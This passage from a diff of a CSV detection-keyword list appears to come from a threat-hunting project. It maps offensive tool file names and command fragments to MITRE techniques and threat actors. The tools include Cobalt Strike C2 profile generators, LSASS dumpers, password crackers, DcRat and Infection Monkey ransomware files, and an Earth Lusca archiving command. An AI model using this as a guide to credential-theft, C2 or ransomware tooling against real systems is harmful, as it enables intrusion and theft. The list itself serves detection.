attaching to remote gdb servers","T1057 - T1064 - T1059 - T1202","TA0002 - TA0008 - TA0001","N/A","N/A","Information Gathering","https://github.com/radareorg/radare2","1","0","N/A","N/A","10","18645","2913","2023-10-04T08:34:11Z","2012-07-03T07:42:26Z" +"*radius2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*radius2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*RAI/ase_docker*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" "*rai-attack-servers.*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" "*RainbowCrack*","offensive_tool_keyword","RainbowCrack","The RainbowCrack tool is a hash cracker that makes use of a large-scale time-memory trade-off. A traditional brute force cracker tries all possible plaintexts one by one. which can be time consuming for complex passwords. RainbowCrack uses a time-memory trade-off to do all the cracking-time computation in advance and store the results in so-called rainbow tables. It does take a long time to precompute the tables but RainbowCrack can be hundreds of times faster than a brute force cracker once the precomputation is finished. For downloads and more information. 
visit the RainbowCrack homepage","T1110 - T1208 - T1212 - T1609","TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Credential Access","http://project-rainbowcrack.com/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*rai-redirector-dns*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" "*rai-redirector-http*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - 
T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" -"*raiseChild.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*raiseChild.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*rajkumardusad/onex*","offensive_tool_keyword","onex","Onex is a package manager for hacker's. Onex manage more than 400+ hacking tools that can be installed on single click","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/rajkumardusad/onex","1","1","N/A","N/A","","N/A","","","" "*rajkumardusad/Tool-X*","offensive_tool_keyword","Tool-X","Tool-X is a Kali Linux hacking tools installer for Termux and linux system. Tool-X was developed for Termux and linux based systems. Using Tool-X you can install almost 370+ hacking tools in Termux (android) and other Linux based distributions. 
Now Tool-X is available for Ubuntu Debian etc.","T1212 - T1566 - T1550 - T1133","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/rajkumardusad/Tool-X","1","1","N/A","N/A","","N/A","","","" -"*RAMDOMdd28f0dcd9779315ee130deb565dbf315587f1611e54PASSWORD*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","100","9","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" -"*random_c2_profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*random_c2profile.*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile 
generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*random_user_agent.params*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - 
TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" -"*random_user_agent.user_agent*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","544","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*RAMDOMdd28f0dcd9779315ee130deb565dbf315587f1611e54PASSWORD*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - 
TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*random_c2_profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*random_c2profile.*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - 
T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*random_user_agent.params*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*random_user_agent.user_agent*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - 
T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*randomalice1986@*","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. 
Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","1","email user name","3","10","4154","709","2023-10-01T22:26:34Z","2015-06-11T12:24:17Z" "*-RandomAttackPath -Token*","offensive_tool_keyword","badazure","BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/mvelazc0/BadZure/","1","0","N/A","5","4","302","18","2023-07-27T15:40:41Z","2023-05-05T04:52:21Z" "*randombob1986@*","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","1","email user name","3","10","4154","709","2023-10-01T22:26:34Z","2015-06-11T12:24:17Z" "*randomize_sw2_seed.py*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" "*Ransomware POC tool that encrypts a given directory*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" -"*Ransomware.dll*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","817","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" -"*Ransomware.pdb*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","817","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" -"*ransomware_config.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" -"*ransomware_payload.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" +"*Ransomware.dll*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - 
T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*Ransomware.pdb*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*ransomware_config.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*ransomware_payload.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" "*Ransomware-E20F7CED-42AD-485E-BE4D-DE21DCE58EC0.json*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z" "*RansomwarePoc.cpp*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "*RansomwarePoc.exe*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - 
T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" 
@@ -15538,8 +15708,8 @@
 "*Rapid7*","offensive_tool_keyword","rapid7","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://www.rapid7.com/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*rapid7.github.io/metasploit-framework/api/*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
 "*Rar a -v3g -k -r -s -m3 *","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
-"*rar2john *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
-"*rar2john.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*rar2john *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*rar2john.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
